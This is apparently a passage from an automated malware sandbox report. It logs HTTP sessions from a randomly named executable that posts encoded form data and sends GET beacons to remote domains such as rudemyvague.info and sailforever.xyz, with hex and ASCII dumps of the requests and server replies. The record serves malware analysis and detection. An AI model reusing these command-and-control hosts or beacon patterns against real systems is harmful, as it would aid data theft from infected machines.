                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                  Permissions-Policy: geolocation=(), microphone=()
                                                                                                                                  Expires: 0
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  Data Raw: 32 66 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 95 df 6f 9b 30 10 c7 9f cb 5f 61 31 4d 6d a5 26 e4 47 93 34 94 20 4d 5b 3b 4d da c3 b4 4e 7b 37 f8 42 bc 81 4d 6d 43 9b 56 fb 5f f6 d8 fc 1d f9 c7 76 86 90 a6 95 3a 78 c2 9c 7d 9f fb de f9 6c 07 2b 93 a5 a1 e3 04 2b a0 2c 74 02 c3 4d 0a e1 4d 91 e7 0a b4 e6 52 10 06 9a 30 29 c4 76 03 3a f0 ea 79 07 1d b4 59 57 a3 48 b2 f5 a3 73 b4 94 c2 f4 96 34 e3 e9 da ff a0 38 4d 2f 77 36 cd 1f c0 1f 4e f3 fb 4b e7 8f e3 ac 86 8f 87 f6 d1 c0 da 8f 0c dc 9b 9e 51 54 e8 a5 54 99 8f d1 41 c5 54 43 e5 d2 8f 12 eb 14 d1 f8 77 a2 64 21 98 5f a8 f4 e4 d8 d3 dc 80 c7 b3 c4 43 1c 1b f6 ef 20 ca 8f 4f 49 0c c2 80 22 46 e6 44 c8 9e 82 1c a8 69 30 a3 56 cc a8 0b 66 dc 8a 19 77 c1 9c b7 62 ce bb 60 26 ad 98 49 17 cc b4 15 33 ed 82 99 b5 62 66 5d 30 17 ad 98 8b 2e 98 79 2b 66 de 05 33 1c b4 f7 df a0 0b e8 05 a6 3e 01 24 96 25 a8 7a c1 83 14 f0 03 8f 02 2e 73 8e 32 aa 12 2e 7a c8 c1 53 52 1f 93 03 df 58 a6 52 f9 ef 46 a3 11 da 65 4e 63 6e d6 fe a0 3f 9f e0 ef 1d 67 66 e5 cf 06 ef [TRUNCATED]
                                                                                                                                  Data Ascii: 2fdo0_a1Mm&G4 M[;MN{7BMmCV_v:x}l++,tMMR0)v:yYWHs48M/w6NKQTTATCwd!_C OI"FDi0Vfwb`&I3bf]0.y+f3>$%z.s2.zSRXRFeNcn?gf/N%q4Gouz]<ZDuU\8/'wSV#QV/s[]F\A8i"Q{kl7 $$|)e\Ra4O$/yLb0Dn^A*'s~"#Pf.a_T{g8]~yXx%B1a\m#-2S\3Q!n\pK"(|ZJyjfA*NP7>6YIpvYpmi?.4/X.
                                                                                                                                  Oct 22, 2024 22:56:47.091932058 CEST106INData Raw: c9 53 1a c3 4a a6 0c d4 c2 fd 59 c5 bb aa 67 14 60 49 15 20 b3 19 b9 84 78 e1 b3 88 17 31 74 11 65 fc 39 ca cd be 04 af 92 c7 5d 16 4d ca 2e a9 da 74 e1 56 6f d1 1d f0 64 65 fc 08 b5 5c 92 37 1f 23 9b 5b b5 25 bb f6 0b bc 7d 1d 1a b3 87 1d 6d f7
                                                                                                                                  Data Ascii: SJYg`I x1te9]M.tVode\7#[%}moe0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  2192.168.2.55308052.13.151.179801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:56:49.206492901 CEST776OUTPOST /t7t4/ HTTP/1.1
                                                                                                                                  Host: www.rudemyvague.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.rudemyvague.info
                                                                                                                                  Referer: http://www.rudemyvague.info/t7t4/
                                                                                                                                  Content-Length: 226
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 45 4f 73 66 47 75 4e 45 7a 67 6d 2f 57 48 59 42 39 35 57 53 79 7a 5a 5a 48 50 30 50 75 73 5a 57 38 4f 76 57 76 44 4b 39 76 77 67 62 47 49 4b 6d 4e 69 2f 37 44 67 2f 4f 6a 2f 56 38 43 39 49 64 50 56 51 31 51 37 49 35 70 6d 79 6d 5a 49 6e 63 72 4e 4f 51 4d 48 71 63 50 53 69 74 2b 44 32 67 64 2b 73 39 48 51 38 4e 72 36 31 39 72 70 2f 2b 51 6a 74 55 6e 46 56 68 38 75 75 64 66 33 42 2f 6c 34 30 31 30 52 4e 71 30 38 67 48 77 50 49 6c 69 52 53 78 30 34 42 79 79 73 6e 34 43 41 64 35 55 56 62 38 61 61 4f 46 4f 6f 47 6c 51 69 42 7a 4a 75 41 63 5a 48 30 37 37 74 73 53 59 32 46 4d 58 69 34 58 67 47 6c 30 59 76 33 7a 52 68 61 6d 35 67 48 43 34 75 6e 79 6d 68 46 79
                                                                                                                                  Data Ascii: DrelH=EOsfGuNEzgm/WHYB95WSyzZZHP0PusZW8OvWvDK9vwgbGIKmNi/7Dg/Oj/V8C9IdPVQ1Q7I5pmymZIncrNOQMHqcPSit+D2gd+s9HQ8Nr619rp/+QjtUnFVh8uudf3B/l4010RNq08gHwPIliRSx04Byysn4CAd5UVb8aaOFOoGlQiBzJuAcZH077tsSY2FMXi4XgGl0Yv3zRham5gHC4unymhFy
                                                                                                                                  Oct 22, 2024 22:56:49.901544094 CEST1236INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.10.3
                                                                                                                                  Date: Tue, 22 Oct 2024 20:56:49 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/5.3.3
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                  Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                  Permissions-Policy: geolocation=(), microphone=()
                                                                                                                                  Expires: 0
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  Data Raw: 32 66 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 95 df 6f 9b 30 10 c7 9f cb 5f 61 31 4d 6d a5 26 e4 47 93 34 94 20 4d 5b 3b 4d da c3 b4 4e 7b 37 f8 42 bc 81 4d 6d 43 9b 56 fb 5f f6 d8 fc 1d f9 c7 76 86 90 a6 95 3a 78 c2 9c 7d 9f fb de f9 6c 07 2b 93 a5 a1 e3 04 2b a0 2c 74 02 c3 4d 0a e1 4d 91 e7 0a b4 e6 52 10 06 9a 30 29 c4 76 03 3a f0 ea 79 07 1d b4 59 57 a3 48 b2 f5 a3 73 b4 94 c2 f4 96 34 e3 e9 da ff a0 38 4d 2f 77 36 cd 1f c0 1f 4e f3 fb 4b e7 8f e3 ac 86 8f 87 f6 d1 c0 da 8f 0c dc 9b 9e 51 54 e8 a5 54 99 8f d1 41 c5 54 43 e5 d2 8f 12 eb 14 d1 f8 77 a2 64 21 98 5f a8 f4 e4 d8 d3 dc 80 c7 b3 c4 43 1c 1b f6 ef 20 ca 8f 4f 49 0c c2 80 22 46 e6 44 c8 9e 82 1c a8 69 30 a3 56 cc a8 0b 66 dc 8a 19 77 c1 9c b7 62 ce bb 60 26 ad 98 49 17 cc b4 15 33 ed 82 99 b5 62 66 5d 30 17 ad 98 8b 2e 98 79 2b 66 de 05 33 1c b4 f7 df a0 0b e8 05 a6 3e 01 24 96 25 a8 7a c1 83 14 f0 03 8f 02 2e 73 8e 32 aa 12 2e 7a c8 c1 53 52 1f 93 03 df 58 a6 52 f9 ef 46 a3 11 da 65 4e 63 6e d6 fe a0 3f 9f e0 ef 1d 67 66 e5 cf 06 ef [TRUNCATED]
                                                                                                                                  Data Ascii: 2fdo0_a1Mm&G4 M[;MN{7BMmCV_v:x}l++,tMMR0)v:yYWHs48M/w6NKQTTATCwd!_C OI"FDi0Vfwb`&I3bf]0.y+f3>$%z.s2.zSRXRFeNcn?gf/N%q4Gouz]<ZDuU\8/'wS%QV/s[]F\A8i"Q{kl7 $$|)e\Ra4O$/yLb0Dn^A*'s~"#Pf.a_T{g8]~yXx%B1a\m#-2S\3Q!n\pK"(|ZJyjfA*NP7>6YIpvYpmi?.4/X.
                                                                                                                                  Oct 22, 2024 22:56:49.901715994 CEST106INData Raw: c9 53 1a c3 4a a6 0c d4 c2 fd 59 c5 bb aa 67 14 60 49 15 20 b3 19 b9 84 78 e1 b3 88 17 31 74 11 65 fc 39 ca cd be 04 af 92 c7 5d 16 4d ca 2e a9 da 74 e1 56 6f d1 1d f0 64 65 fc 08 b5 5c 92 37 1f 23 9b 5b b5 25 bb f6 0b bc 7d 1d 1a b3 87 1d 6d f7
                                                                                                                                  Data Ascii: SJYg`I x1te9]M.tVode\7#[%}mo\HSe0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  3192.168.2.55309252.13.151.179801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:56:51.749663115 CEST1793OUTPOST /t7t4/ HTTP/1.1
                                                                                                                                  Host: www.rudemyvague.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.rudemyvague.info
                                                                                                                                  Referer: http://www.rudemyvague.info/t7t4/
                                                                                                                                  Content-Length: 1242
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 45 4f 73 66 47 75 4e 45 7a 67 6d 2f 57 48 59 42 39 35 57 53 79 7a 5a 5a 48 50 30 50 75 73 5a 57 38 4f 76 57 76 44 4b 39 76 32 34 62 61 71 43 6d 4f 41 58 37 41 67 2f 4f 34 2f 56 35 43 39 49 41 50 55 30 78 51 37 45 44 70 6a 32 6d 62 71 76 63 71 38 4f 51 5a 58 71 63 51 69 69 6f 6a 54 32 31 64 2b 64 30 48 51 73 4e 72 36 31 39 72 73 7a 2b 41 47 42 55 33 31 56 69 2f 75 75 72 62 33 42 44 6c 38 59 44 30 52 35 36 30 73 41 48 7a 75 34 6c 6c 69 36 78 38 34 42 77 31 73 6e 67 43 41 5a 6d 55 56 58 47 61 62 37 59 4f 76 71 6c 54 31 41 71 4d 66 4d 6b 4d 45 49 70 78 2f 6c 32 5a 32 56 30 5a 6b 38 45 6f 46 78 4f 62 4e 7a 4f 63 6b 4f 62 36 52 65 34 68 5a 6a 42 32 46 6f 41 6a 2b 6c 6b 59 76 76 6f 42 66 74 6b 61 4e 74 76 41 47 37 71 4d 43 57 6c 6f 77 6e 67 7a 57 67 33 69 58 51 51 51 42 79 72 32 63 52 6e 73 51 6a 51 30 55 41 30 61 38 57 74 52 32 46 34 74 7a 6d 4d 62 44 62 4f 4a 66 54 57 34 6f 50 38 6f 77 4d 79 44 6e 6a 2b 54 46 72 57 4f 54 71 78 55 55 4b 35 38 79 2f 51 48 65 6a 6e 50 64 34 52 42 67 36 41 [TRUNCATED]
                                                                                                                                  Data Ascii: DrelH=EOsfGuNEzgm/WHYB95WSyzZZHP0PusZW8OvWvDK9v24baqCmOAX7Ag/O4/V5C9IAPU0xQ7EDpj2mbqvcq8OQZXqcQiiojT21d+d0HQsNr619rsz+AGBU31Vi/uurb3BDl8YD0R560sAHzu4lli6x84Bw1sngCAZmUVXGab7YOvqlT1AqMfMkMEIpx/l2Z2V0Zk8EoFxObNzOckOb6Re4hZjB2FoAj+lkYvvoBftkaNtvAG7qMCWlowngzWg3iXQQQByr2cRnsQjQ0UA0a8WtR2F4tzmMbDbOJfTW4oP8owMyDnj+TFrWOTqxUUK58y/QHejnPd4RBg6AIIvS6V/+0ezZ3iOu8lWqw04FVH208/Q3yWJ+cGE0dzu8NfLB/PHAPsyKJcYuk55rFQ8GdDXf9UO/vUTlmsQo/IZjwy6XWKT7ZciL9CFOw1CLUaIyaYTraUOzplCrUmzX1zz7t8QW3syFh6dMQpOAfYWkHYQNsDpSwjOOrNoLtX104Ka3TADZl0dttyGqOUsKIoq4j0ZQCBzVYKOhGOmF603D+aV034W5e+rhJx2Yy6DxzqaWBjnpnc0snu0yLp+jTOBK98Q/VLrd1W2uAmRb8JwYY4G+ZyBk6K8WwbM7xWAqxYeLpqMXcCin1nLbXFxH2Ggo3Jb/wc0aoSR99mUORKjwXeuzkirVYovOGJuIAsDkqxOZS8gmhBDEKBMGpiz540eX7Uk9zmjK2MriNQWrmyg4X72aS8xDOG1Fb1Kv50AhRCxcbgV2erk6gPuLBR7S6t4NPbUTcT00s9eCK/hOvPQleuWpCgigWl8E1BCySD3LOO3Lh1UTJj2FayQUmZ78l7hnb40lqRF6y/R92oHuJGt99zuQwTZXm7LCerzDBoy7AeRV1y0sTJ+zySb9aTpQA83B6vRmvcs5aUzjFWuc3QEPgGGRxJTZ1psvsdWxH/F7OoMHxq/LngKbQJxMcqNV75lg3UmaygRq/jP2+KBezl+Qi16DSbpABZ [TRUNCATED]
                                                                                                                                  Oct 22, 2024 22:56:53.020669937 CEST1236INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.10.3
                                                                                                                                  Date: Tue, 22 Oct 2024 20:56:52 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/5.3.3
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                  Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                  Permissions-Policy: geolocation=(), microphone=()
                                                                                                                                  Expires: 0
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  Data Raw: 32 66 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 95 df 6f 9b 30 10 c7 9f cb 5f 61 31 4d 6d a5 26 e4 47 93 34 94 20 4d 5b 3b 4d da c3 b4 4e 7b 37 f8 42 bc 81 4d 6d 43 9b 56 fb 5f f6 d8 fc 1d f9 c7 76 86 90 a6 95 3a 78 c2 9c 7d 9f fb de f9 6c 07 2b 93 a5 a1 e3 04 2b a0 2c 74 02 c3 4d 0a e1 4d 91 e7 0a b4 e6 52 10 06 9a 30 29 c4 76 03 3a f0 ea 79 07 1d b4 59 57 a3 48 b2 f5 a3 73 b4 94 c2 f4 96 34 e3 e9 da ff a0 38 4d 2f 77 36 cd 1f c0 1f 4e f3 fb 4b e7 8f e3 ac 86 8f 87 f6 d1 c0 da 8f 0c dc 9b 9e 51 54 e8 a5 54 99 8f d1 41 c5 54 43 e5 d2 8f 12 eb 14 d1 f8 77 a2 64 21 98 5f a8 f4 e4 d8 d3 dc 80 c7 b3 c4 43 1c 1b f6 ef 20 ca 8f 4f 49 0c c2 80 22 46 e6 44 c8 9e 82 1c a8 69 30 a3 56 cc a8 0b 66 dc 8a 19 77 c1 9c b7 62 ce bb 60 26 ad 98 49 17 cc b4 15 33 ed 82 99 b5 62 66 5d 30 17 ad 98 8b 2e 98 79 2b 66 de 05 33 1c b4 f7 df a0 0b e8 05 a6 3e 01 24 96 25 a8 7a c1 83 14 f0 03 8f 02 2e 73 8e 32 aa 12 2e 7a c8 c1 53 52 1f 93 03 df 58 a6 52 f9 ef 46 a3 11 da 65 4e 63 6e d6 fe a0 3f 9f e0 ef 1d 67 66 e5 cf 06 ef [TRUNCATED]
                                                                                                                                  Data Ascii: 2fdo0_a1Mm&G4 M[;MN{7BMmCV_v:x}l++,tMMR0)v:yYWHs48M/w6NKQTTATCwd!_C OI"FDi0Vfwb`&I3bf]0.y+f3>$%z.s2.zSRXRFeNcn?gf/N%q4Gouz]<ZDuU\8/'wS'QV/s[]F\A8i"Q{kl7 $$|)e\Ra4O$/yLb0Dn^A*'s~"#Pf.a_T{g8]~yXx%B1a\m#-2S\3Q!n\pK"(|ZJyjfA*NP7>6YIpvYpmi?.4/X.
                                                                                                                                  Oct 22, 2024 22:56:53.020713091 CEST106INData Raw: c9 53 1a c3 4a a6 0c d4 c2 fd 59 c5 bb aa 67 14 60 49 15 20 b3 19 b9 84 78 e1 b3 88 17 31 74 11 65 fc 39 ca cd be 04 af 92 c7 5d 16 4d ca 2e a9 da 74 e1 56 6f d1 1d f0 64 65 fc 08 b5 5c 92 37 1f 23 9b 5b b5 25 bb f6 0b bc 7d 1d 1a b3 87 1d 6d f7
                                                                                                                                  Data Ascii: SJYg`I x1te9]M.tVode\7#[%}moe0
                                                                                                                                  Oct 22, 2024 22:56:53.020777941 CEST106INData Raw: c9 53 1a c3 4a a6 0c d4 c2 fd 59 c5 bb aa 67 14 60 49 15 20 b3 19 b9 84 78 e1 b3 88 17 31 74 11 65 fc 39 ca cd be 04 af 92 c7 5d 16 4d ca 2e a9 da 74 e1 56 6f d1 1d f0 64 65 fc 08 b5 5c 92 37 1f 23 9b 5b b5 25 bb f6 0b bc 7d 1d 1a b3 87 1d 6d f7
                                                                                                                                  Data Ascii: SJYg`I x1te9]M.tVode\7#[%}moe0
                                                                                                                                  Oct 22, 2024 22:56:53.021024942 CEST1236INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.10.3
                                                                                                                                  Date: Tue, 22 Oct 2024 20:56:52 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/5.3.3
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                  Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                  Permissions-Policy: geolocation=(), microphone=()
                                                                                                                                  Expires: 0
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  Data Raw: 32 66 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 95 df 6f 9b 30 10 c7 9f cb 5f 61 31 4d 6d a5 26 e4 47 93 34 94 20 4d 5b 3b 4d da c3 b4 4e 7b 37 f8 42 bc 81 4d 6d 43 9b 56 fb 5f f6 d8 fc 1d f9 c7 76 86 90 a6 95 3a 78 c2 9c 7d 9f fb de f9 6c 07 2b 93 a5 a1 e3 04 2b a0 2c 74 02 c3 4d 0a e1 4d 91 e7 0a b4 e6 52 10 06 9a 30 29 c4 76 03 3a f0 ea 79 07 1d b4 59 57 a3 48 b2 f5 a3 73 b4 94 c2 f4 96 34 e3 e9 da ff a0 38 4d 2f 77 36 cd 1f c0 1f 4e f3 fb 4b e7 8f e3 ac 86 8f 87 f6 d1 c0 da 8f 0c dc 9b 9e 51 54 e8 a5 54 99 8f d1 41 c5 54 43 e5 d2 8f 12 eb 14 d1 f8 77 a2 64 21 98 5f a8 f4 e4 d8 d3 dc 80 c7 b3 c4 43 1c 1b f6 ef 20 ca 8f 4f 49 0c c2 80 22 46 e6 44 c8 9e 82 1c a8 69 30 a3 56 cc a8 0b 66 dc 8a 19 77 c1 9c b7 62 ce bb 60 26 ad 98 49 17 cc b4 15 33 ed 82 99 b5 62 66 5d 30 17 ad 98 8b 2e 98 79 2b 66 de 05 33 1c b4 f7 df a0 0b e8 05 a6 3e 01 24 96 25 a8 7a c1 83 14 f0 03 8f 02 2e 73 8e 32 aa 12 2e 7a c8 c1 53 52 1f 93 03 df 58 a6 52 f9 ef 46 a3 11 da 65 4e 63 6e d6 fe a0 3f 9f e0 ef 1d 67 66 e5 cf 06 ef [TRUNCATED]
                                                                                                                                  Data Ascii: 2fdo0_a1Mm&G4 M[;MN{7BMmCV_v:x}l++,tMMR0)v:yYWHs48M/w6NKQTTATCwd!_C OI"FDi0Vfwb`&I3bf]0.y+f3>$%z.s2.zSRXRFeNcn?gf/N%q4Gouz]<ZDuU\8/'wS'QV/s[]F\A8i"Q{kl7 $$|)e\Ra4O$/yLb0Dn^A*'s~"#Pf.a_T{g8]~yXx%B1a\m#-2S\3Q!n\pK"(|ZJyjfA*NP7>6YIpvYpmi?.4/X.


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  4192.168.2.55310152.13.151.179801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:56:54.296303988 CEST485OUTGET /t7t4/?DrelH=JME/FbwkkQiTLR8EmPe57WZ7VagZp8tJ+vLJvTOCgHppMKWbYWfaRFz4/PgkMvknA1YharU87nKdOM/7k7q3IkusQQuIzTW/Q+d1GThbq9ZzxZjoWmxr4FVA7qWfBnIN3A==&Sx=gnM4ZH HTTP/1.1
                                                                                                                                  Host: www.rudemyvague.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Oct 22, 2024 22:56:54.995570898 CEST1236INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.10.3
                                                                                                                                  Date: Tue, 22 Oct 2024 20:56:54 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/5.3.3
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                  Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                  Permissions-Policy: geolocation=(), microphone=()
                                                                                                                                  Expires: 0
                                                                                                                                  Data Raw: 37 36 35 0d 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 70 70 72 65 73 73 69 6f 6e 20 64 65 73 20 64 6f 6e 6e c3 a9 65 73 3c 2f 74 69 74 6c 65 3e 0a 0a 0a 3c 73 74 79 6c 65 3e 0a 0a 62 6f 64 79 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 0a 7d 0a 0a 68 31 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 0a 09 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 3b 0a 7d 0a 0a 2e 62 67 31 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 2f 69 6d 67 2f 66 6f 6e 64 31 2e 77 65 62 70 27 29 20 63 65 6e 74 65 72 20 74 6f 70 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 7d 0a 0a 2e 62 67 32 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 2f 69 6d 67 2f 66 6f 6e 64 32 2e 77 65 62 70 27 29 20 63 65 6e 74 65 72 20 74 6f 70 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 7d 0a 0a 2e 62 67 33 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 [TRUNCATED]
                                                                                                                                  Data Ascii: 765<html><head><title>Suppression des donnes</title><style>body{font-family:Arial;font-size:16px;}h1{font-size:20px;text-transform:uppercase;}.bg1{background:url('/site/img/fond1.webp') center top no-repeat;}.bg2{background:url('/site/img/fond2.webp') center top no-repeat;}.bg3{background:url('/site/img/fond3.webp') center top no-repeat;}.bg4{background:url('/site/img/fond4.webp') center top no-repeat;}.bg5{background:url('/site/img/fond5.webp') center top no-repeat;}.bg6{background:url('/site/img/fond6.webp') center top no-repeat;}.bg7{background:url('/site/img/fond7.webp') center top no-repeat;}.bg8{background:url('/site/i
                                                                                                                                  Oct 22, 2024 22:56:54.995696068 CEST1210INData Raw: 6d 67 2f 66 6f 6e 64 38 2e 77 65 62 70 27 29 20 63 65 6e 74 65 72 20 74 6f 70 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 7d 0a 0a 2e 62 67 39 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 2f 69 6d 67 2f 66 6f 6e 64 39 2e 77 65
                                                                                                                                  Data Ascii: mg/fond8.webp') center top no-repeat;}.bg9{background:url('/site/img/fond9.webp') center top no-repeat;}.bg10{background:url('/site/img/fond10.webp') center top no-repeat;}.bg{background-size: cover;}.zoneText{margin-top:


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  5192.168.2.553160103.106.67.112801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:57:08.469630003 CEST753OUTPOST /hshp/ HTTP/1.1
                                                                                                                                  Host: www.sailforever.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.sailforever.xyz
                                                                                                                                  Referer: http://www.sailforever.xyz/hshp/
                                                                                                                                  Content-Length: 206
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 42 44 4b 6b 52 65 56 4f 51 57 41 57 47 49 57 37 6f 31 6c 46 39 77 7a 79 7a 69 58 68 61 65 46 61 67 63 4c 4b 30 71 6b 2b 61 54 39 6a 68 38 46 2b 70 39 36 59 4d 6c 72 74 57 74 68 6d 78 32 46 46 5a 74 43 71 36 34 49 6f 56 42 4e 2b 32 44 62 72 6c 71 4e 38 62 6c 49 6f 31 71 68 4c 56 2b 58 47 76 31 4b 47 58 47 75 41 5a 61 6c 6b 4e 2b 31 52 77 51 6a 7a 35 54 6b 4b 44 78 4d 4d 62 6f 53 47 45 50 7a 52 46 35 4d 35 4b 4e 38 48 76 65 34 58 37 44 4d 66 76 51 7a 46 48 6c 61 31 75 33 56 43 69 63 38 6d 6c 4a 76 4b 6f 78 73 45 77 74 6f 4e 4e 30 4e 55 33 42 31 30 59 72 36 52 47 43 4b 70 72 78 42 74 45 35 55 3d
                                                                                                                                  Data Ascii: DrelH=BDKkReVOQWAWGIW7o1lF9wzyziXhaeFagcLK0qk+aT9jh8F+p96YMlrtWthmx2FFZtCq64IoVBN+2DbrlqN8blIo1qhLV+XGv1KGXGuAZalkN+1RwQjz5TkKDxMMboSGEPzRF5M5KN8Hve4X7DMfvQzFHla1u3VCic8mlJvKoxsEwtoNN0NU3B10Yr6RGCKprxBtE5U=
                                                                                                                                  Oct 22, 2024 22:57:09.202450037 CEST245INHTTP/1.1 302 Found
                                                                                                                                  Location: https://www.sailforever.xyz/hshp/
                                                                                                                                  Server: Dynamic Http Server
                                                                                                                                  X-Ratelimit-Limit: 101
                                                                                                                                  X-Ratelimit-Remaining: 100
                                                                                                                                  X-Ratelimit-Reset: 1
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:09 GMT
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
